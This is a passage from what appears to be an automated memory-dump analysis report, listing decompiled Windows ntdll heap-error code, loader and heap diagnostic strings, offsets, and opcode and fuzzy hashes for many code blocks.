                                                                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                        						_push(_t104);
                                                                        						E018EB150();
                                                                        					} else {
                                                                        						E018EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                        					}
                                                                        					_push( *0x19d58b4);
                                                                        					E018EB150("Last known valid blocks: before - %p, after - %p\n",  *0x19d58b0);
                                                                        				} else {
                                                                        					_t120 =  *0x19d58b4; // 0x0
                                                                        					if(_t120 != 0) {
                                                                        						goto L41;
                                                                        					}
                                                                        				}
                                                                        				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                        					_push(_t104);
                                                                        					E018EB150();
                                                                        				} else {
                                                                        					E018EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                        				}
                                                                        				return E018EB150("Stack trace available at %p\n", 0x19d58c0);
                                                                        			}

                                                                        Address column of the next decompiled block (instruction text not present in the extraction; blank cells dropped): 0x019a1c10, 0x019a1c16, 0x019a1c1e, 0x019a1c3d, 0x019a1c3e, 0x019a1c20, 0x019a1c35, 0x019a1c3a, 0x019a1c44, 0x019a1c55, 0x019a1c5a, 0x019a1c65, 0x019a1c67, 0x019a1c6e, 0x019a1c67, 0x019a1cdc, 0x019a1ce5, 0x019a1d04, 0x019a1d05, 0x019a1ce7, 0x019a1cfc, 0x019a1d01, 0x019a1d0b, 0x019a1d17, 0x019a1d1f, 0x019a1d25, 0x019a1d30, 0x019a1d4f, 0x019a1d50, 0x019a1d32, 0x019a1d47, 0x019a1d4c, 0x019a1d61, 0x019a1d67, 0x019a1d68, 0x019a1d6e, 0x019a1d79, 0x019a1d98, 0x019a1d99, 0x019a1d7b, 0x019a1d90, 0x019a1d95, 0x019a1daa, 0x019a1db0, 0x019a1db1, 0x019a1db7, 0x019a1dc2, 0x019a1de1, 0x019a1de2, 0x019a1dc4, 0x019a1dd9, 0x019a1dde, 0x019a1df3, 0x019a1df9, 0x019a1dfa, 0x019a1e00, 0x019a1e0a, 0x019a1e13, 0x019a1e32, 0x019a1e33, 0x019a1e15, 0x019a1e2a, 0x019a1e2f, 0x019a1e39, 0x019a1e4a, 0x019a1e02, 0x019a1e02, 0x019a1e08, 0x019a1e08, 0x019a1e5b, 0x019a1e7a, 0x019a1e7b, 0x019a1e5d, 0x019a1e72, 0x019a1e77, 0x019a1e95

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                        • API String ID: 0-2897834094
                                                                        • Opcode ID: 463937bb7d6bb47389da54ac2d48b4ed172b5dd83e8f7e20d12453faec466e24
                                                                        • Instruction ID: 7fc905fe641b585093c078973334c92c78366a21359bf8fbdd098d4ca127e475
                                                                        • Opcode Fuzzy Hash: 463937bb7d6bb47389da54ac2d48b4ed172b5dd83e8f7e20d12453faec466e24
                                                                        • Instruction Fuzzy Hash: A161A432916646DFD211AB49D489D2473F4EB04B71F9A847EF60DDF301D634DA888B8B
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • Kernel-MUI-Number-Allowed, xrefs: 018F3D8C
                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 018F3E97
                                                                        • Kernel-MUI-Language-Allowed, xrefs: 018F3DC0
                                                                        • WindowsExcludedProcs, xrefs: 018F3D6F
                                                                        • Kernel-MUI-Language-SKU, xrefs: 018F3F70
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                        • API String ID: 0-258546922
                                                                        • Opcode ID: c107189b849611e63071afdb5f7ced11b5497bfebe754c6288abcb6939abee79
                                                                        • Instruction ID: f1e5deaad3a4697e17f8bf5f07f3a0d1d2e6abed068e15dd8f5e295b298b1c52
                                                                        • Opcode Fuzzy Hash: c107189b849611e63071afdb5f7ced11b5497bfebe754c6288abcb6939abee79
                                                                        • Instruction Fuzzy Hash: 4BF1F872D00619EBCB15DFD8C980AEEBBB9FF58750F15006AEA05E7251E7359A01CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • LdrpFindDllActivationContext, xrefs: 01959331, 0195935D
                                                                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0195932A
                                                                        • Querying the active activation context failed with status 0x%08lx, xrefs: 01959357
                                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 0195933B, 01959367
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                        • API String ID: 0-3779518884
                                                                        • Opcode ID: 9f87bb8c14dc25a759baec0779c6b2896feb6753bff3170cb61769c2429fa587
                                                                        • Instruction ID: e035cdfff0b1530630469dbe942d5c09d0c29152b523c2ad295485a4630fc761
                                                                        • Opcode Fuzzy Hash: 9f87bb8c14dc25a759baec0779c6b2896feb6753bff3170cb61769c2429fa587
                                                                        • Instruction Fuzzy Hash: 8E412B31A0031DDEEF36BA1C888DE75BAB8AB0174AF06452DE90C9755AE770BDC093C1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • LdrpDoPostSnapWork, xrefs: 01949C1E
                                                                        • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01949C18
                                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 01949C28
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                        • API String ID: 2994545307-1948996284
                                                                        • Opcode ID: 0bd3615cf86db8f1425639e2e47f5ec60d5743dc7ad5504886da79c84d9fb702
                                                                        • Instruction ID: 115f4ae17fec64627a0ae599477dc7b75d8facf355fe9691fc73f4aa024b213d
                                                                        • Opcode Fuzzy Hash: 0bd3615cf86db8f1425639e2e47f5ec60d5743dc7ad5504886da79c84d9fb702
                                                                        • Instruction Fuzzy Hash: FD910231A1021A9FEB28DF59D480ABABBB5FF86315F15416DDB09EB241D730EA41CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • Could not validate the crypto signature for DLL %wZ, xrefs: 01949891
                                                                        • minkernel\ntdll\ldrmap.c, xrefs: 019498A2
                                                                        • LdrpCompleteMapModule, xrefs: 01949898
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                        • API String ID: 0-1676968949
                                                                        • Opcode ID: b4bc3b9eefd3272cc45dd150a22ae1997f2b5ce56810f99631e5cf0b78890533
                                                                        • Instruction ID: 62ed30e306e25240851a4a8c7c2128eb7f1bb9550f7c99df43b9c0df7a3af753
                                                                        • Opcode Fuzzy Hash: b4bc3b9eefd3272cc45dd150a22ae1997f2b5ce56810f99631e5cf0b78890533
                                                                        • Instruction Fuzzy Hash: CC51DF316007469BF726CF6CC944F2A7BE4AB45B18F1405AEEA55DB3D2D734EA00C751
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • InstallLanguageFallback, xrefs: 018EE6DB
                                                                        • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 018EE68C
                                                                        • @, xrefs: 018EE6C0
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                        • API String ID: 0-1757540487
                                                                        • Opcode ID: 2d33d0de909ab38f79edd7c7b8fd939adf9d63cb306f4e4bcd0a3286617be18b
                                                                        • Instruction ID: b748a74847807429204f3c7dc319eb4c78cb88705ab14ba33dc0f303df7a31be
                                                                        • Opcode Fuzzy Hash: 2d33d0de909ab38f79edd7c7b8fd939adf9d63cb306f4e4bcd0a3286617be18b
                                                                        • Instruction Fuzzy Hash: DD51D3766043169BE714DF68C844E6BB7E8BF89B15F05092EFA89D7240F734DA04C7A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `$`
                                                                        • API String ID: 0-197956300
                                                                        • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                        • Instruction ID: fadee3e50c9157a2b2f7ff8f9c525d63a6108d197412ec29867939e7034e857c
                                                                        • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                        • Instruction Fuzzy Hash: 43918F316043429FE725CE29C845B1BBBE9AFC4715F54892DF699CB280E774E908CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: Legacy$UEFI
                                                                        • API String ID: 2994545307-634100481
                                                                        • Opcode ID: 6a9301f9b91f793b1b25e3f95a2af17c13b8cf9b6305817aaca67a383ff27440
                                                                        • Instruction ID: cf688324e3c5a479a7c06eba18ecc9ce9ae6caf161456344f37e4c6bbac81676
                                                                        • Opcode Fuzzy Hash: 6a9301f9b91f793b1b25e3f95a2af17c13b8cf9b6305817aaca67a383ff27440
                                                                        • Instruction Fuzzy Hash: 54515E71A00619DFEB15DFA9C980EAEBBF8FF44B40F15442DE64DEB251D6719900CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0190B9A5
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID:
                                                                        • API String ID: 885266447-0
                                                                        • Opcode ID: d342a66e0ba1145fbca4cc04a04c78d6188a720b42d93e73e3fd173c834fec2b
                                                                        • Instruction ID: b5390e925eb39b181f40a5e1c3f20ddc7e34055d576a2095a24e534f6182f676
                                                                        • Opcode Fuzzy Hash: d342a66e0ba1145fbca4cc04a04c78d6188a720b42d93e73e3fd173c834fec2b
                                                                        • Instruction Fuzzy Hash: 6B516C75A08301CFC722CF69C08092ABBE9FB88715F54496EE59A97385D730E884CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: _vswprintf_s
                                                                        • String ID:
                                                                        • API String ID: 677850445-0
                                                                        • Opcode ID: 7a26eb6d9c2ebc26f8988f94ee53238038726c1106adacfdb306b020d2ae369a
                                                                        • Instruction ID: 00f0c8458247485828571b61ddcab353c227e5bdc14dc0f7f784f84544f4396f
                                                                        • Opcode Fuzzy Hash: 7a26eb6d9c2ebc26f8988f94ee53238038726c1106adacfdb306b020d2ae369a
                                                                        • Instruction Fuzzy Hash: CC51FD75D0026A8BEB35CF688845FAEBBF4BF40715F2042A9D85DAB282C7304941DB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
Similarity
• String ID: PATH
• API String ID: 0-1036084923
Strings
• *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0195BE0F
Memory Dump Source
• Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
Similarity
• String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
• API String ID: 0-865735534
Strings
Memory Dump Source
• Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
Similarity
• String ID: RTL: Re-Waiting
• API String ID: 0-316354757
Strings
Memory Dump Source
• Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
Similarity
• String ID: `
• API String ID: 0-2679148245
Strings
Memory Dump Source
• Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
Similarity
• String ID: @
• API String ID: 0-2766056989
Strings
Memory Dump Source
• Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
Similarity
• String ID: BinaryHash
• API String ID: 0-2202222882
Strings
Memory Dump Source
• Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
Similarity
• String ID: `
• API String ID: 0-2679148245
Strings
Memory Dump Source
• Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
Similarity
• String ID: BinaryName
• API String ID: 0-215506332
Strings
Memory Dump Source
• Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
Similarity
• String ID: @
• API String ID: 0-2766056989
Strings
Memory Dump Source
• Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
Similarity
• String ID: WindowsExcludedProcs
• API String ID: 0-3583428290
Strings
Memory Dump Source
• Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
Similarity
• String ID: Actx
• API String ID: 0-89312691
Strings
• Critical error detected %lx, xrefs: 01998E21
Memory Dump Source
• Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
Similarity
• String ID: Critical error detected %lx
• API String ID: 0-802127002
Strings
• NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0197FF60
Memory Dump Source
• Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
Similarity
• String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
• API String ID: 0-1911121157
                                                                        • Opcode ID: fa8bf9eff41dc70e6eaa12a1d09f9bbff3957d07b10cf728d154294602e384b1
                                                                        • Instruction ID: 9e37219e603556dae1b493fa634077efac6d2af94ed181689533559c21eb22a0
                                                                        • Opcode Fuzzy Hash: fa8bf9eff41dc70e6eaa12a1d09f9bbff3957d07b10cf728d154294602e384b1
                                                                        • Instruction Fuzzy Hash: 9C71F232200706AFE736EF19C845F66BBE9EF80725F144928E65E876A0DB75E940CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ec9d8a875d376fceedd65343b5bc967d00405d0147419d59b8a57a00409dc614
                                                                        • Instruction ID: 3c4abbcf3bd5a5b56d3c425e2738f6bb22ee02ec2f5ce42b902ebb76c1926be7
                                                                        • Opcode Fuzzy Hash: ec9d8a875d376fceedd65343b5bc967d00405d0147419d59b8a57a00409dc614
                                                                        • Instruction Fuzzy Hash: C951CD352053429FD722EF68C844B27BBE4FF90718F14091EF69997652E770E944C7A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3194eb8f0c87b6fef1fab7a26fedb2fc1dc72b3a9fa529bf37e826757315d98f
                                                                        • Instruction ID: 1cd91b74cde5a0bad8de937ea860cb427a6193e4676c13e5f788dbf6551833e9
                                                                        • Opcode Fuzzy Hash: 3194eb8f0c87b6fef1fab7a26fedb2fc1dc72b3a9fa529bf37e826757315d98f
                                                                        • Instruction Fuzzy Hash: C451C576B00119CFCB15DF1CC8809BDB7F1FB89700725845AE95A9B369D730AAD1CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d5ebdcb1f6a012ab48c84fd25f98f6227f2a483517949c20f290735b1d7d26fc
                                                                        • Instruction ID: 5850b3ee9615a1beb62e6db5363314ca4336e91707583e6ee06288d312f065b3
                                                                        • Opcode Fuzzy Hash: d5ebdcb1f6a012ab48c84fd25f98f6227f2a483517949c20f290735b1d7d26fc
                                                                        • Instruction Fuzzy Hash: B241F4717002115BD72A9A29C894B3BB79DEF84621F944619FA1E872D0DB34E809C6D1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 034c910ad39690bb7c4d068c48d97d208a8320cad082aaa70f0c20cd04a36690
                                                                        • Instruction ID: cec8723bf4f967786a49fd372f898f613d3663194a1bff8fb19aa6285ce96688
                                                                        • Opcode Fuzzy Hash: 034c910ad39690bb7c4d068c48d97d208a8320cad082aaa70f0c20cd04a36690
                                                                        • Instruction Fuzzy Hash: 5B519175E01616DFCB16CFE8C480A9EBBF5BB48310F24855AD959E7385DB30AA84CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                        • Instruction ID: 08ecceee30e2dbf053223caaea4219a70bc1b56b6a3a8fe9b5c5bb1324dcc27d
                                                                        • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                        • Instruction Fuzzy Hash: AF51F331A042499FEB25CB6CC0C0BAEBBB1EF45318F1881ACC745D3282C375AB89C751
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                        • Instruction ID: b8c50eb76d99e31ad7cf296018118cf64d8f681afec41b32199c7c878d17fceb
                                                                        • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                        • Instruction Fuzzy Hash: 1F51C171500646DFDB1ACF58C980A91BBF9FF85705F14C1AAE90C9F292E3B1E945CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0c4b7850f72a6834be908802372e903db69709d66e2073232fed193ef833305d
                                                                        • Instruction ID: b7878a9dc311b03135c8ffb84b0d3265667c8c26ac4027c405cd73e3d7bbad2e
                                                                        • Opcode Fuzzy Hash: 0c4b7850f72a6834be908802372e903db69709d66e2073232fed193ef833305d
                                                                        • Instruction Fuzzy Hash: C5517B72A0020EDFDF25EF58C980EDEBBB6FF48310F258155E918AB255C3319992CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6c6113174d99895b6ab92692d52558c54c2ff6142c7e8262d71c38c82c0175ce
                                                                        • Instruction ID: 6d82704903c6460456a1f63ce49b86a413556468b05f27beddc252ca73724b91
                                                                        • Opcode Fuzzy Hash: 6c6113174d99895b6ab92692d52558c54c2ff6142c7e8262d71c38c82c0175ce
                                                                        • Instruction Fuzzy Hash: C441F471A44318AFEB32DF18CC80F6AB7A9EB49710F000499E94D9B285D770ED80CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 36fc5fea2ccd9647122e3634e2ccd3d25fcd92054e41b5ba0c975c375c094da6
                                                                        • Instruction ID: 81fde450853b3f675c6fdd12d3111c431ac45045f7dceb6da87723c0f74f32e4
                                                                        • Opcode Fuzzy Hash: 36fc5fea2ccd9647122e3634e2ccd3d25fcd92054e41b5ba0c975c375c094da6
                                                                        • Instruction Fuzzy Hash: 6841B131E402299BDB21DF68C940FEAB7F8EF49750F4104A5E90CAB245EB349E84CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 86df3a2a386a5d5c26699dbd179c635085a3d014ca1d2a85cef78c9f2abe4425
                                                                        • Instruction ID: 68186cac75908cb36d3500298c7b7f5e64529175728a35b562fd4293986e0508
                                                                        • Opcode Fuzzy Hash: 86df3a2a386a5d5c26699dbd179c635085a3d014ca1d2a85cef78c9f2abe4425
                                                                        • Instruction Fuzzy Hash: C0417FB1A0022D9BDB24CF59C888AA9B7F4EB95300F1045EADA19D7242E7709F84CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                        • Instruction ID: 9d98d9590d768fdd65e4d590a880d76335f09098ce0b11c845ae4faaafa1983f
                                                                        • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                        • Instruction Fuzzy Hash: 7F31E5322006416FD322976CC844F6EBBEDEBC5751F984458E68D8B742DA75EC45C7D0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                        • Instruction ID: 776784e524cdd7382452f89afd2fad7b23b2f29a7d289ea13ceade230f7dbb7e
                                                                        • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                        • Instruction Fuzzy Hash: 4631B2726047069BC719DF28C894A6BB7AAFFC0310F44492DF65A87785DE30E909CBE5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f86ae8ed453438f102d30c25c16f748f91eb2a004a42e26edec722ee953cc21b
                                                                        • Instruction ID: fb91bebf26b3b23277fa9bff33d57190ed22ab2dec97160552b64cf1c91de174
                                                                        • Opcode Fuzzy Hash: f86ae8ed453438f102d30c25c16f748f91eb2a004a42e26edec722ee953cc21b
                                                                        • Instruction Fuzzy Hash: 4F419FB1D01209AFDB24DFAAD940BFEBBF8EF48714F14812EE918A3240DB709905CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: eccf99df8609b940380a8bee51e379f743085921e377ccf439a619c4c78d0ea4
                                                                        • Instruction ID: db7f35c75f9e94c1f8da1701d0a457a56314e2e8672c45631f6745b0bf208460
                                                                        • Opcode Fuzzy Hash: eccf99df8609b940380a8bee51e379f743085921e377ccf439a619c4c78d0ea4
                                                                        • Instruction Fuzzy Hash: 02314631240711DFC726AF28C880FAA77E9FF50768F154A19FA8D8B1A0D730E900C690
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3498c888e89a9c1f6ea4b4259e90856567bfba5e026830629d83899ad4cf8a8e
                                                                        • Instruction ID: 137a41f1cd60bf88093b5094871d3c9df8805240848d6370c092bfe02df1a422
                                                                        • Opcode Fuzzy Hash: 3498c888e89a9c1f6ea4b4259e90856567bfba5e026830629d83899ad4cf8a8e
                                                                        • Instruction Fuzzy Hash: 0331CD31A00625DBD725CF2EC841A3ABBB8FF89700B05846EE94DDB354E638DA40C790
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2f5703a791366243700744b7fab8bbdba47f428aeeeb02992386b3f05d4a1162
                                                                        • Instruction ID: e842a122830c981934a2363e9671983e30a8b26e7304c860f52d06216ce4dffc
                                                                        • Opcode Fuzzy Hash: 2f5703a791366243700744b7fab8bbdba47f428aeeeb02992386b3f05d4a1162
                                                                        • Instruction Fuzzy Hash: 1E419CB5A01249DFEB19CF58C590BA9BBF1BB89304F198469E908AB348C774AD81CB54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
